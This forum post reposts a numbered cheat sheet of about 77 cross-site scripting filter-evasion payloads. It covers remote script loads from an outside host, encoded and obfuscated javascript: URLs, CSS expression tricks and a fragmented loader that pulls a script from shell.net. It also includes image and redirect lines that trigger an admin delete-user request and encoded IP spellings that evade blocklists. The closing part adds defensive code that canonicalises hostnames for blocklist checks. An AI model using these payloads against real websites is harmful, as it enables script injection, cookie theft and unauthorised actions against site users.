It seems t00ls has relatively little material on XSS. I saw a good collection and copied it over; not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag with a JavaScript command
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (use a character-code calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode entity encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) Long 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab splitting "javascript" (a literal tab character)
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab splitting "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multiline injected JavaScript, an extreme XSS example: the tag is written one character per line, collapsed here onto one line
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null bytes are essentially useless in practice now, since there is nowhere left where they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG SRC
<IMG SRC=" &#14;  javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open angle brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets with an iframe
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping already-escaped JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag (an event handler; needs neither javascript: nor <SCRIPT>)
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) Stylesheet LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG with VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters inserted in front of javascript: (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (any tag name works: an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Using ActionScript inside the Flash file to obfuscate your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace (the .HTC file must be on the same server as your XSS vector)
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code in a file with an image extension and load it from there
<SCRIPT SRC="http://3w.org/XSS/xss.jpg"></SCRIPT>
(59) IMG embedded command: the image request is sent with the victim's cookies, so any action triggered by a GET request can be executed on their behalf
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2 (a.jpg is on your own server; this Apache rule redirects the image request)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing quote and symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67) Splitting the script tag with document.write
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL string evasion (an IP address instead of the blocked hostname)
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding of the hostname
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(70) IP address as a decimal dword
<A HREF="http://3232235521">XSS</A>
(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding (a newline and tabs inside the URL, and each address component in a different base)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
(74) Omitting "http:" (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>
(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
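Items (68) to (76) defeat hostname blocklists that compare strings. The following added example (not from the original post or its source) reduces each of those host spellings to one canonical form before comparing, following the classic inet_aton rules for numeric hosts (one to four parts; 0x prefix for hex, leading 0 for octal, otherwise decimal; the last part fills the remaining bytes), percent-decoding as in (69), removing the tab and newline characters that (73) relies on, and dropping the trailing dot of (76). `canonicalizeHost` and `isBlockedHost` are names chosen here; the addresses in the test are the ones from the list above.

```javascript
// Added example; not part of the original post. Canonicalise the host spellings
// from items (68)-(76) so that a blocklist check compares addresses, not strings.

// Parse one dotted component the way inet_aton does; NaN if it is not numeric.
function parseIpPart(p) {
  if (/^0x[0-9a-f]+$/i.test(p)) return parseInt(p.slice(2), 16); // hex (71)
  if (/^0[0-7]*$/.test(p)) return parseInt(p, 8);                 // octal (72), "0" is 0
  if (/^[1-9][0-9]*$/.test(p)) return parseInt(p, 10);            // decimal
  return NaN;                                                     // e.g. "08", "3w"
}

// Returns dotted-decimal for any numeric host, the lower-cased name for a DNS
// host, or null for a numeric host that is out of range.
function canonicalizeHost(rawHost) {
  let host;
  try { host = decodeURIComponent(rawHost); } catch (e) { host = rawHost; } // (69)
  host = host.replace(/[\t\n\r]/g, '').toLowerCase();                      // (73)
  if (host.endsWith('.')) host = host.slice(0, -1);                         // (76)
  const parts = host.split('.');
  if (parts.length > 4) return host;
  const nums = parts.map(parseIpPart);
  if (nums.some(Number.isNaN)) return host;   // not a numeric host, keep the name
  // The last component fills all remaining bytes: "3232235521" is one part
  // filling four bytes (70); "192.168.1" would be 192.168.0.1.
  const remainingBytes = 4 - (nums.length - 1);
  const last = nums[nums.length - 1];
  if (last >= 2 ** (8 * remainingBytes)) return null;
  if (nums.slice(0, -1).some(n => n > 255)) return null;
  let value = 0;
  for (const n of nums.slice(0, -1)) value = value * 256 + n;
  value = value * 2 ** (8 * remainingBytes) + last;
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join('.');
}

// Blocklist check that canonicalises both sides. An out-of-range numeric host
// is treated as blocked so that malformed input fails closed.
function isBlockedHost(rawHost, blocklist) {
  const c = canonicalizeHost(rawHost);
  if (c === null) return true;
  return blocklist.map(canonicalizeHost).includes(c);
}
```

With `["192.168.0.1"]` as the blocklist, the dword, hex, octal and mixed-base spellings from (70) to (73) are all caught, while a plain string comparison would pass every one of them.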
Original source: http://fuzzexp.org/u/0day/?p=14